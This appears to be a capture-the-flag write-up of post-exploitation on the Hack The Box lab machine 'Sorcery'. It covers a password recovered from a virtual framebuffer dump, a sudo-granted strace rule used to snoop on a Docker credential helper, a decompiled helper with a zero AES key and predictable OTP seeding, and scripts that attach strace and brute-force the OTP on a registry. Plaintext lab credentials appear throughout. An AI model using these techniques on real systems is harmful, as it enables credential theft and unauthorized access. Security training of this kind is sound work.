- Domain: SORCERY.HTB
- IP addresses:
  - eth0: 10.129.255.204 (public)
  - docker0: 172.17.0.1
  - Other Docker bridges: 172.19.0.1, 172.21.0.1, 172.23.0.1
- Domain Controller: dc01.sorcery.htb (seen in /etc/hosts and FreeIPA configs)
- Local listening services:
  - Kerberos-related ports: 88, 389, 636, 464
  - HTTPS: 443
  - HTTP (local only): 5000
  - DNS: 127.0.0.53:53, 127.0.0.54:53
Users
user has sudo and lxd permissions, and some interesting accounts are listed:
- root
- user (sudoer, member of lxd)
- tom_summers
- tom_summers_admin
- rebecca_smith
- vagrant
Potential lateral movement users: tom_summers, tom_summers_admin (unusual process parents), rebecca_smith.
Processes
Notable sssd (System Security Services Daemon) Processes:
- sssd is active with submodules: sssd_be, sssd_pam, sssd_nss, etc.
- It's configured to connect to FreeIPA or a remote LDAP provider (/etc/krb5.conf, /etc/ipa/, /usr/libexec/sssd/...).
- Hints:
- This may tie into Active Directory or FreeIPA-based Kerberos authentication.
- Investigate credential caching, misconfigurations, or stored tickets.
Xvfb | tom_summers_admin
This process:
/usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24 -nolisten local
This runs as a non-root user but with a parent process owned by root — extremely suspicious, and flagged by LinPEAS directly:

Check /xorg/xvfb directory for writable files or exposed sockets (.X11-unix/X1).
FreeIPA & Kerberos
Files Found:
- /etc/krb5.conf
- /etc/ipa/default.conf
- /etc/ipa/nssdb/{cert9.db,key4.db}
- /usr/bin/ipa
Note:
- FreeIPA XML-RPC API: https://dc01.sorcery.htb/ipa/xml
- ipa-client-install has been run, so this host is an enrolled FreeIPA client.
Directories & Files
/opt/scripts:
- Owned by: admin:admins
- Permission: drwx------ (only the admin user can access)
- Potential custom scripts or secrets.
/tmp/.X1-lock (from Xvfb):
- Used to lock the :1 display.
- Check whether .X11-unix/X1 exists and is writable to possibly hijack the X11 session (or for keylogging/sniffing).
Services/Ports
| Port | Service | Notes |
|---|---|---|
| 443 | HTTPS | Public and localhost |
| 88 | Kerberos | Local only |
| 389 | LDAP | Local only |
| 636 | LDAPS | Local only |
| 5000 | HTTP (Flask?) | Local only |
| 464 | Kerberos kpasswd | Local only |
All Kerberos/LDAP services are bound to localhost, hinting this is a Kerberos/LDAP client, not server.
Xvfb
X Virtual Framebuffer
During post-exploitation, we identified that the user tom_summers_admin was running a virtual X server:
/usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24
Xvfb (X Virtual Framebuffer) is a headless display server — like a fake monitor that runs GUI apps without a real screen.
- -fbdir /xorg/xvfb means Xvfb will create a memory-mapped file at /xorg/xvfb/Xvfb_screen0
- Xvfb directly writes the framebuffer of screen 0 into that file
- Dimensions: 512 x 256 with 24-bit color depth (i.e., 3 bytes per pixel, RGB)
- Calculated raw frame size: 512 * 256 * 3 = 393216 bytes
- Observed file size: 527520 bytes → that's 134304 bytes larger than expected
Xvfb_screen0 is a raw framebuffer where graphical content (e.g., browser window, terminal, GUI login) is dumped. This means tom_summers_admin is likely running a GUI app in the background, and Xvfb is recording it.
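The size mismatch itself hints at the format. One consistent explanation — an assumption, not confirmed yet at this point: an XWD dump whose 24-bit-depth pixels are padded to 32 bits per pixel, plus a 256-entry colormap — is easy to check with arithmetic:

```python
# Hypothetical breakdown of the 527520-byte file (assumption: XWD layout,
# depth 24 stored as 32 bits/pixel, 12-byte colormap entries):
header = 0xA0              # XWD header incl. window-name string = 160 bytes
colormap = 256 * 12        # 256 XWDColor entries, 12 bytes each = 3072
pixels = 512 * 256 * 4     # ZPixmap, 24-bit depth padded to 4 bytes per pixel
print(header + colormap + pixels)
# -> 527520, exactly the observed file size
```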
Framebuffer Extraction
The framebuffer output is being dumped to:
tom_summers@main:~$ ls -l /xorg/xvfb/Xvfb_screen0
-rwxr--r-- 1 tom_summers_admin tom_summers_admin 527520 Jun 17 06:26 /xorg/xvfb/Xvfb_screen0
This is a raw framebuffer file and likely contains graphical data from the virtual X session. If tom_summers_admin is interacting with GUI apps (e.g. browsers, terminals, password prompts), this file could leak sensitive info such as typed credentials, web activity, or desktop apps.
However, the actual file size is 527520 bytes (much larger than the expected 393216), indicating that it contains metadata or is in a structured format rather than raw RGB.
To inspect the file format, we first download the framebuffer to our attack machine:
scp [email protected]:/xorg/xvfb/Xvfb_screen0 .
Running a hexdump and string analysis reveals a classic XWD (X Window Dump) header:
$ hexdump -C Xvfb_screen0 | head
00000000 00 00 00 a0 00 00 00 07 00 00 00 02 00 00 00 18 |................|
00000010 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 20 00 00 00 00 00 00 00 20 00 00 00 20 |... ....... ... |
00000030 00 00 08 00 00 00 00 04 00 ff 00 00 00 00 ff 00 |................|
00000040 00 00 00 ff 00 00 00 08 00 00 01 00 00 00 01 00 |................|
00000050 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 58 76 66 62 20 6d 61 69 6e 2e 73 6f |....Xvfb main.so|
00000070 72 63 65 72 79 2e 68 74 62 3a 31 2e 30 00 00 00 |rcery.htb:1.0...|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
The Xvfb main.sorcery.htb:1.0 string is a classic XWD hostname field, confirming this is a valid xwd file, even though it's named Xvfb_screen0.
The first few hex lines match the xwd_file_header structure:
struct xwd_file_header {
    CARD32 header_size;
    CARD32 file_version;
    CARD32 pixmap_format;
    CARD32 pixmap_depth;
    CARD32 pixmap_width;
    CARD32 pixmap_height;
    ...
};
Our data:
00000000  00 00 00 a0 → header_size = 0xa0 = 160 bytes
00000004  00 00 00 07 → file_version = 7
00000008  00 00 00 02 → pixmap_format = 2 (ZPixmap)
0000000c  00 00 00 18 → pixmap_depth = 24
00000010  00 00 02 00 → width = 512
00000014  00 00 01 00 → height = 256
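The same fields can be pulled out programmatically with struct; the bytes here are reproduced from the hexdump above:

```python
import struct

# First six big-endian CARD32 fields of the XWD header, as seen in the hexdump.
hdr = bytes.fromhex("000000a0" "00000007" "00000002" "00000018" "00000200" "00000100")
header_size, file_version, pixmap_format, pixmap_depth, width, height = struct.unpack(">6I", hdr)
print(header_size, file_version, pixmap_format, pixmap_depth, width, height)
# -> 160 7 2 24 512 256
```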
Since this is an XWD file, it can be directly converted using ImageMagick:
magick Xvfb_screen0 out.png
Jackpot:

Password retrieved for user tom_summers_admin:
dWpuk7cesBjT-
SSH login as the new privileged user:

Sudo
Check sudo privileges for tom_summers_admin:
tom_summers_admin@main:~$ sudo -l
Matching Defaults entries for tom_summers_admin on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tom_summers_admin may run the following commands on localhost:
(rebecca_smith) NOPASSWD: /usr/bin/docker login
(rebecca_smith) NOPASSWD: /usr/bin/strace -s 128 -p [0-9]*
User tom_summers_admin can run the following as rebecca_smith without a password:
docker login
This allows us to log in interactively to a Docker registry. The credential store specified in $HOME/.docker/config.json tells the Docker Engine which helper to use; details are in the official documentation.
It seems not immediately useful, but important if:
- Docker daemon is available to
rebecca_smith - Docker is configured with root access (default)
Testing the command:
sudo -u rebecca_smith /usr/bin/docker login
The error message reveals that docker login is indeed executed as rebecca_smith, but fails to access the Docker daemon socket.
Still, it tries to authenticate with rebecca_smith's existing credentials — which means it accessed and processed the stored credentials.
strace -p
This is highly sensitive: it allows attaching strace to any process owned by rebecca_smith (-s 128 ensures longer strings are captured, up to 128 bytes).
strace uses the ptrace() syscall, which:
- Allows one process (the tracer) to observe and control another (the tracee)
- Can intercept syscalls, inspect arguments, and even change return values
For example, when we attach to a process doing execve("/bin/bash", ...), strace (the tracer) sees that syscall before it executes, and can log or even modify it.
We can abuse the ability to run:
sudo -u rebecca_smith /usr/bin/strace -s 128 -p [PID]
This means if rebecca_smith runs anything interactive, we can snoop on it.
Hold on — anything interactive? How about when we run docker login, which spawns a login prompt as rebecca_smith?
Docker Registry
Pspy
We can run pspy to monitor processes and filesystem access:

It leaks:
htpasswd -Bbc /home/vagrant/source/registry/auth/registry.password rebecca_smith -7eAZDp9-f9mg310463
- -B: Use bcrypt for hashing the password.
- -b: Take the password from the command line (not interactively).
- -c: Create the file or overwrite it.
htpasswd is a command-line utility that comes with the Apache HTTP Server tools — Its job is to create and manage basic HTTP authentication password files.
-7eAZDp9-f9mg is the password, while 310463 is the appended OTP used to log in to the Basic-auth Docker Registry.
The root user overwrites the file registry.password and stores credentials for user rebecca_smith with password -7eAZDp9-f9mg310463, using bcrypt hashing.
registry.password is a basic auth credential database for some web service — and based on the path:
/home/vagrant/source/registry/auth/registry.password
It is very likely for a Docker Registry running in a private environment.
This is very likely an unintended route.
Docker Credential Helper
Under the home directory of tom_summers_admin, we see a suspicious hidden path .docker:
tom_summers_admin@main:~$ ls -l .docker/config.json
-rw-r--r-- 1 700 tom_summers_admin 32 Oct 30 2024 .docker/config.json
tom_summers_admin@main:~$ cat .docker/config.json
{ "credsStore": "docker-auth" }
This config line tells Docker to use a credential store helper (the value of the config property is the suffix of the program to use, i.e. everything after docker-credential-) named:
docker-credential-docker-auth
During docker login, Docker will execute:
/usr/bin/docker-credential-docker-auth get
as the current user — in this case, as rebecca_smith when invoked via:
sudo -u rebecca_smith /usr/bin/docker login
We can inspect this /usr/bin/docker-credential-docker-auth file:
tom_summers_admin@main:~$ which docker-credential-docker-auth
/usr/bin/docker-credential-docker-auth
tom_summers_admin@main:~$ ls -l /usr/bin/docker-credential-docker-auth
-rwxr-x--- 1 rebecca_smith tom_summers_admin 67189841 Apr 6 13:58 /usr/bin/docker-credential-docker-auth
This means:
- The file is owned by rebecca_smith
- The group is tom_summers_admin
It's executable, but not writable, for user tom_summers_admin. Since it's invoked during docker login and is responsible for credential storage and retrieval, we may be able to extract rebecca_smith's login password/token when docker login calls this helper.
Docker CLI uses credential helpers like this:
docker-credential-<credsStore> get
docker-credential-<credsStore> store
docker-credential-<credsStore> erase
When we run:
sudo -u rebecca_smith /usr/bin/docker login
Docker passes our typed username and password to the helper binary, like so:
echo '{"ServerURL":"http://127.0.0.1:5000/v2"}' | docker-credential-docker-auth get
The helper reads the JSON from stdin, looks up the stored credential (or asks for it), and returns plaintext like:
{ "Username": "rebecca_smith", "Secret": "-7eAZDp9-f9mg310463" }
This is used to verify our auth request.
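For intuition, the helper's get verb can be sketched in a few lines. This is purely illustrative — the store and secret below are hypothetical placeholders; the real helper reads rebecca_smith's credential file:

```python
import json

# Hypothetical in-memory credential store, for illustration only.
STORE = {"http://127.0.0.1:5000/v2": {"Username": "rebecca_smith", "Secret": "<secret>"}}

def handle_get(payload: str) -> str:
    """Answer a credential-helper 'get' request: accept either the JSON
    wrapper used above or a bare server URL, and return credentials as JSON."""
    try:
        obj = json.loads(payload)
        server = obj.get("ServerURL", "") if isinstance(obj, dict) else payload.strip()
    except json.JSONDecodeError:
        server = payload.strip()
    return json.dumps(STORE.get(server, {"Username": "", "Secret": ""}))

print(handle_get('{"ServerURL":"http://127.0.0.1:5000/v2"}'))
```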
Port 5000
We see port 5000 open from the LinPEAS result.
Probing it locally confirms a private Docker Registry: a local registry is listening and responding properly.
Reversing
We can test the docker credential helper:
echo '{"ServerURL":"127.0.0.1:5000"}' | /usr/bin/docker-credential-docker-auth get
An error pops out:
Unhandled exception. System.UnauthorizedAccessException: Access to the path '/home/rebecca_smith/.docker/creds' is denied. ---> System.IO.IOException: Permission denied --- End of inner exception stack trace --- at Interop.ThrowExceptionForIoErrno(ErrorInfo errorInfo, String path, Boolean isDirError) …
It's trying to read a file:
/home/rebecca_smith/.docker/creds
We can't read it as tom_summers_admin, so the program crashes with:
UnauthorizedAccessException
Since we can read /usr/bin/docker-credential-docker-auth (our user is in its owning group), we can download the binary for inspection:
scp [email protected]:/usr/bin/docker-credential-docker-auth .
Since this is a .NET binary, open it in dotPeek:
using Microsoft.CSharp.RuntimeBinder;
using Mono.Unix;
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text.Json;
#nullable enable
if (args.Length != 1)
{
Console.Error.WriteLine("Invalid arguments.");
}
else
{
Dictionary<string, (Action<object>, InputType)> dictionary1 = new Dictionary<string, (Action<object>, InputType)>();
dictionary1.Add("get", (new Action<object>(HandleGet), InputType.Plain));
dictionary1.Add("store", (new Action<object>(HandleStore), InputType.Json));
dictionary1.Add("otp", (new Action<object>(HandleOtp), InputType.None));
(Action<object>, InputType) valueTuple;
if (!dictionary1.TryGetValue(args[0], ref valueTuple))
{
Console.WriteLine("Not implemented.");
}
else
{
object obj = (object) "";
if (valueTuple.Item2 != InputType.None)
{
string json = Console.ReadLine();
if (json == null)
{
Console.Error.WriteLine("Input is empty");
return;
}
switch (valueTuple.Item2)
{
case InputType.Plain:
obj = (object) json;
break;
case InputType.Json:
try
{
Dictionary<string, object> dictionary2 = JsonSerializer.Deserialize<Dictionary<string, object>>(json);
if (dictionary2 == null)
{
Console.Error.WriteLine("Invalid JSON format");
return;
}
obj = (object) dictionary2;
break;
}
catch (JsonException ex)
{
Console.Error.WriteLine("Invalid JSON data");
return;
}
}
}
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__0 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__0 = CallSite<Action<CallSite, Action<object>, object>>.Create(Binder.Invoke(CSharpBinderFlags.ResultDiscarded, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
Program.\u003C\u003Eo__0.\u003C\u003Ep__0.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__0, valueTuple.Item1, obj);
}
}
static UnixUserInfo GetCurrentExecutableOwner() => new UnixFileInfo("/proc/self/exe").OwnerUser;
static string GetCredsPath(string username) => "/home/" + username + "/.docker/creds";
static void HandleOtp(object dynamicArgs)
{
new Random(DateTime.Now.Minute / 10 + (int) GetCurrentExecutableOwner().UserId).Next(100000, 999999);
Console.WriteLine("OTP is currently experimental. Please ask our admins for one");
}
static void HandleGet(object dynamicArgs)
{
byte[] numArray1 = Convert.FromBase64String(File.ReadAllText(GetCredsPath(GetCurrentExecutableOwner().UserName)));
using (Aes aes = Aes.Create())
{
byte[] numArray2 = new byte[16];
byte[] numArray3 = new byte[16];
aes.Key = numArray2;
aes.IV = numArray3;
ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);
using (MemoryStream memoryStream = new MemoryStream(numArray1))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read))
{
using (StreamReader streamReader = new StreamReader((Stream) cryptoStream))
{
string end = ((TextReader) streamReader).ReadToEnd();
Credentials credentials;
try
{
credentials = JsonSerializer.Deserialize<Credentials>(end);
}
catch (JsonException ex)
{
Console.Error.WriteLine("Invalid credentials format");
return;
}
if (credentials.Username == null)
Console.Error.WriteLine("Missing username");
else if (credentials.Secret == null)
{
Console.Error.WriteLine("Missing secret");
}
else
{
Console.Error.WriteLine("This account might be protected by two-factor authentication");
Console.Error.WriteLine("In case login fails, try logging in with <password><otp>");
Console.WriteLine(end);
}
}
}
}
}
}
static void HandleStore(object dynamicArgs)
{
Dictionary<string, object> dictionary = dynamicArgs as Dictionary<string, object>;
object obj1;
if (!dictionary.TryGetValue("Username", ref obj1))
{
Console.Error.WriteLine("No username provided");
}
else
{
object obj2;
if (!dictionary.TryGetValue("Secret", ref obj2))
{
Console.Error.WriteLine("No secret provided");
}
else
{
Credentials credentials1 = new Credentials();
ref Credentials local1 = ref credentials1;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__2 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__2 = CallSite<Func<CallSite, object, string>>.Create(Binder.Convert(CSharpBinderFlags.None, typeof (string), typeof (Program)));
Func<CallSite, object, string> target1 = Program.\u003C\u003Eo__0.\u003C\u003Ep__2.Target;
CallSite<Func<CallSite, object, string>> p2 = Program.\u003C\u003Eo__0.\u003C\u003Ep__2;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__1 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__1 = CallSite<Func<CallSite, Type, object, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "ToString", (IEnumerable<Type>) null, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType | CSharpArgumentInfoFlags.IsStaticType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
object obj3 = Program.\u003C\u003Eo__0.\u003C\u003Ep__1.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__1, typeof (Convert), obj1);
string str1 = target1((CallSite) p2, obj3);
local1.Username = str1;
ref Credentials local2 = ref credentials1;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__4 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__4 = CallSite<Func<CallSite, object, string>>.Create(Binder.Convert(CSharpBinderFlags.None, typeof (string), typeof (Program)));
Func<CallSite, object, string> target2 = Program.\u003C\u003Eo__0.\u003C\u003Ep__4.Target;
CallSite<Func<CallSite, object, string>> p4 = Program.\u003C\u003Eo__0.\u003C\u003Ep__4;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__3 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__3 = CallSite<Func<CallSite, Type, object, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "ToString", (IEnumerable<Type>) null, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType | CSharpArgumentInfoFlags.IsStaticType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
object obj4 = Program.\u003C\u003Eo__0.\u003C\u003Ep__3.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__3, typeof (Convert), obj2);
string str2 = target2((CallSite) p4, obj4);
local2.Secret = str2;
Credentials credentials2 = credentials1;
using (Aes aes = Aes.Create())
{
byte[] numArray1 = new byte[16];
byte[] numArray2 = new byte[16];
aes.Key = numArray1;
aes.IV = numArray2;
ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, encryptor, CryptoStreamMode.Write))
{
using (StreamWriter streamWriter = new StreamWriter((Stream) cryptoStream))
((TextWriter) streamWriter).Write(JsonSerializer.Serialize<Credentials>(credentials2));
string base64String = Convert.ToBase64String(memoryStream.ToArray());
File.WriteAllText(GetCredsPath(GetCurrentExecutableOwner().UserName), base64String);
}
}
}
}
}
}
It stores encrypted Docker credentials at:
/home/rebecca_smith/.docker/creds
Docker uses this binary (via credsStore) during docker login and docker pull.
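Notably, HandleGet and HandleStore build the AES key and IV from fresh byte[16] arrays, i.e. sixteen zero bytes each. Assuming that reading of the decompile is correct, anyone who obtains the creds blob can decrypt it offline. A round-trip sketch with openssl and sample data (illustrative values, not the actual file contents):

```shell
# The helper hardcodes an all-zero AES-128 key and IV (byte[16] defaults),
# so the ~/.docker/creds blob is AES-128-CBC under a well-known key.
ZERO=00000000000000000000000000000000          # 16 zero bytes, hex-encoded
plain='{"Username":"rebecca_smith","Secret":"-7eAZDp9-f9mg"}'
# "store": encrypt + base64 (the format written to ~/.docker/creds)
blob=$(printf '%s' "$plain" | openssl enc -aes-128-cbc -K "$ZERO" -iv "$ZERO" | base64 -w0)
# "get": anyone holding the blob can reverse it with the same zero key/IV
printf '%s' "$blob" | base64 -d | openssl enc -d -aes-128-cbc -K "$ZERO" -iv "$ZERO"
```

We never get to read the file directly (it is rebecca_smith-only), which is why the strace route below matters, but the hardcoded key is worth noting.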
The HandleOtp function reveals how the login password for the Docker Registry is formed from the user credential plus an OTP, which we will come back to in a later section.
Strace for Leak
From Pspy, we can observe that docker-credential-docker-auth get is called in the very early stage of the sudo docker login command, which was initiated by the root user:

And the real login request from rebecca_smith (UID=2003) came behind:

Therefore, we can intercept the docker-credential-docker-auth get call, which dereferences the stored Docker credentials, via the sudo strace primitive.
Before running docker login, we can see the end of ps -ef output:
...
root      196844    1262  0 01:25 ?     00:00:00 sshd: tom_summers_admin [priv]
tom_sum+  197102  196844  0 01:26 ?     00:00:00 sshd: tom_summers_admin@pts/4
tom_sum+  197160  197102  0 01:26 pts/4 00:00:00 -bash
tom_sum+  198167  197160 99 01:26 pts/4 00:00:00 ps -ef
After running docker login:
...
root      199599       2  0 01:27 ?     00:00:00 [kworker/1:2-rcu_par_gp]
root      199647       2  0 01:27 ?     00:00:00 [kworker/3:2-rcu_par_gp]
root      200426  196697  0 01:28 pts/3 00:00:00 sudo -u rebecca_smith /usr/bin/docker login
root      200427  200426  0 01:28 pts/5 00:00:00 sudo -u rebecca_smith /usr/bin/docker login
rebecca+  200428  200427  0 01:28 pts/5 00:00:00 /usr/bin/docker login
tom_sum+  200550  197160 99 01:28 pts/4 00:00:00 ps -ef
We don't see the helper (docker-credential-docker-auth) in the ps output. That's because it spawns and exits too quickly to catch with a normal ps -ef diff.
To catch the short-lived docker-credential-docker-auth process, we can create a watcher script:
#!/bin/bash
# watch_docker_helper.sh
echo "[*] Watching for docker-credential-docker-auth..."
while true; do
pid=$(pgrep -u rebecca_smith -f docker-credential-docker-auth)
if [[ -n "$pid" ]]; then
echo "[+] Found docker-credential-docker-auth: PID $pid"
sudo -u rebecca_smith strace -s 128 -p "$pid" -f
break
fi
sleep 0.05
done
We can run sudo ... strace ... with -f at the end of the command. strace -f will follow forked processes, including any subprocess or thread spawned inside.
Keep it running. Then in another terminal, we run:
sudo -u rebecca_smith /usr/bin/docker login
The before/after process diff shows that docker login spawns the chain:
→ sudo (as root)
→ /usr/bin/docker-credential-docker-auth (as rebecca_smith)
→ /usr/bin/docker login (as rebecca_smith)
Once the bash script catches the spawned process:
tom_summers_admin@main:~$ bash watch_docker_helper.sh
[*] Watching for docker-credential-docker-auth...
[+] Found docker-credential-docker-auth: PID 211422
strace: Process 211422 attached with 8 threads
[pid 211432] read(35, <unfinished ...>
[pid 211430] restart_syscall(<... resuming interrupted read ...> <unfinished ...>
[pid 211429] restart_syscall(<... resuming interrupted read ...> <unfinished ...>
We confirm the credential leak via strace: the helper writes the plaintext to FD 33 (write(33, ...)), a pipe connected to Docker's stdin:

This is the same password we retrieved via the unintended way, but with the OTP stripped:
-7eAZDp9-f9mg
This allows us to SSH in as rebecca_smith; while we're at it, we tunnel port 5000 for further inspection of the Docker Registry:
ssh -L 5000:127.0.0.1:5000 [email protected]
OTP
We cannot use Rebecca's credentials alone to log in to the Docker Registry:
rebecca_smith@main:~$ curl -u 'rebecca_smith:-7eAZDp9-f9mg' http://127.0.0.1:5000/v2/_catalog
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
That's because the helper printed a warning:
rebecca_smith@main:~$ echo '{"ServerURL":"http://127.0.0.1:5000/v2"}' | /usr/bin/docker-credential-docker-auth get
This account might be protected by two-factor authentication
In case login fails, try logging in with <password><otp>
{"Username":"rebecca_smith","Secret":"-7eAZDp9-f9mg"}
The endpoint http://127.0.0.1:5000/... requires the password + OTP as the HTTP basic auth -u parameter.
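For reference, curl -u just sends an Authorization: Basic header whose value is base64("user:password"). With the block-4 OTP appended, the header value would be built like this (illustrative only):

```shell
# curl -u 'user:pass' is equivalent to sending:
#   Authorization: Basic $(base64 of "user:pass")
printf '%s' 'rebecca_smith:-7eAZDp9-f9mg310463' | base64 -w0
```

So "password plus OTP" is purely a convention the registry's auth backend enforces; on the wire it is a single basic-auth password string.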
Therefore, our goal is to get the correct 6-digit OTP that matches rebecca_smith's 2FA config, append it to the static password, and use:
curl -u 'rebecca_smith':"<static_password><otp>" http://127.0.0.1:5000/v2/...
From our .NET reversing earlier, the function HandleOtp() was defined as:
static void HandleOtp(object dynamicArgs)
{
new Random(DateTime.Now.Minute / 10 + (int) GetCurrentExecutableOwner().UserId).Next(100000, 999999);
Console.WriteLine("OTP is currently experimental. Please ask our admins for one");
}
This is using System.Random in C#, which is deterministic if seeded with a known value.
Therefore, we can write a short C# snippet that:
- Takes the UID of rebecca_smith (e.g., id -u rebecca_smith → 2003)
- Gets the current minute
- Calculates seed = (minute / 10) + uid (so the OTP updates every 10 minutes)
- Seeds Random(seed) and gets .Next(100000, 999999)
- Appends the result to the static password -7eAZDp9-f9mg
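The seed derivation can be checked from the shell (a sketch assuming UID 2003; the OTP value itself still has to come from .NET's Random, since its generator is not reproducible in bash):

```shell
# Seed the helper would use right now, mirroring
# DateTime.Now.Minute / 10 + UID from HandleOtp.
minute=$(date +%M)
block=$(( 10#$minute / 10 ))     # 10#… avoids octal parsing of "08"/"09"
seed=$(( 2003 + block ))
echo "minute=$minute block=$block seed=$seed"
```

Since the minute ranges 0-59, only six seeds (2003-2008) are ever possible for this UID, which is what makes brute-forcing trivial.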
Since uid = 2003, we can get the OTPs by creating a throw-away console project:
dotnet new console -n otp
Then overwrite the generated Program.cs:
using System;
class Program
{
static void Main()
{
for (int block = 0; block < 6; block++)
{
int seed = 2003 + block; // UID 2003 + minute_block
int otp = new Random(seed).Next(100000, 999999);
Console.WriteLine($"block {block} seed {seed} OTP {otp}");
}
}
}
Build and run:
$ dotnet run --project otp
block 0 seed 2003 OTP 229732
block 1 seed 2004 OTP 699914
block 2 seed 2005 OTP 270098
block 3 seed 2006 OTP 740280
block 4 seed 2007 OTP 310463
block 5 seed 2008 OTP 780645Key insight:
The famous password we saw earlier from the unintended way,
-7eAZDp9-f9mg310463, is simply the base secret plus the OTP for block 4 (40-49 minutes)
Script to enumerate:
#!/usr/bin/env bash
BASE="-7eAZDp9-f9mg"
USER="rebecca_smith"
URL="http://127.0.0.1:5000/v2/"
# OTPs for blocks 0-5 (seeds 2003-2008)
OTPS=(229732 699914 270098 740280 310463 780645)
for otp in "${OTPS[@]}"; do
pwd="${BASE}${otp}"
echo "[*] Trying OTP $otp …"
# Ask only for the headers first (-I); capture HTTP status
code=$(curl -s -o /dev/null -w "%{http_code}" -u "$USER:$pwd" -I "$URL")
if [[ "$code" == "200" || "$code" == "302" || "$code" == "307" ]]; then
echo "[+] OTP $otp accepted (HTTP $code)"
curl -u "$USER:$pwd" "$URL"
exit 0
fi
done
echo "[!] None of the six OTPs worked in this 10-minute window."
Bingo:
rebecca_smith@main:/dev/shm$ bash t.sh
[*] Trying OTP 229732 …
[*] Trying OTP 699914 …
[+] OTP 699914 accepted (HTTP 200)
rebecca_smith@main:/dev/shm$ curl -u 'rebecca_smith:-7eAZDp9-f9mg699914' http://127.0.0.1:5000/v2/_catalog
{"repositories":["test-domain-workstation"]}
We can always use this script to check which OTP works for the moment.
Docker Registry v2 endpoints we can access:
- /v2/_catalog – list repositories
- /v2/<repo>/tags/list – list image tags
- /v2/<repo>/manifests/<tag> – resolve blob digests
List the tags of the repository:
rebecca_smith@main:/dev/shm$ curl -s -u 'rebecca_smith:-7eAZDp9-f9mg699914' \
http://127.0.0.1:5000/v2/test-domain-workstation/tags/list
{"name":"test-domain-workstation","tags":["latest"]}
Fetch the manifest for the latest tag:
curl -s -u 'rebecca_smith:-7eAZDp9-f9mg699914' \
-H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \
"http://127.0.0.1:5000/v2/test-domain-workstation/manifests/latest"
As a result:
{
"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": {
"mediaType": "application/vnd.docker.container.image.v1+json",
"size": 2063,
"digest": "sha256:f7e583abfef8af83c33bafd3498c75ab11680d1eb7ad652cdae61e5b714b1de6"
},
"layers": [
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 30610919,
"digest": "sha256:802008e7f7617aa11266de164e757a6c8d7bb57ed4c972cf7e9f519dd0a21708"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 29979842,
"digest": "sha256:92879ec4738326a2ab395b2427c2ba16d7dcf348f84477653a635c86d0146cb7"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 100598014,
"digest": "sha256:bff382edc3a6db932abb361e3bd5aa09521886b0b79792616fc346b19a9497ea"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 246,
"digest": "sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787"
}
]
}
We now have the manifest and can see the small 246-byte layer:
sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787
Download the layer blob:
DIGEST=sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787
PASS='-7eAZDp9-f9mg699914' # current OTP password; update for the current 10-minute window
USER='rebecca_smith'
curl -u "$USER:$PASS" \
"http://127.0.0.1:5000/v2/test-domain-workstation/blobs/$DIGEST" \
--output blob.tar
Extract and inspect:
tar -xvf blob.tar
Inside, it's a docker-entrypoint.sh:
#!/bin/bash
ipa-client-install --unattended --principal donna_adams --password 3FEVPCT_c3xDH \
--server dc01.sorcery.htb --domain sorcery.htb --no-ntp --force-join --mkhomedir
We now have a domain credential:
Principal : [email protected]
Password : 3FEVPCT_c3xDH
SSH login:

Free IPA
Overview
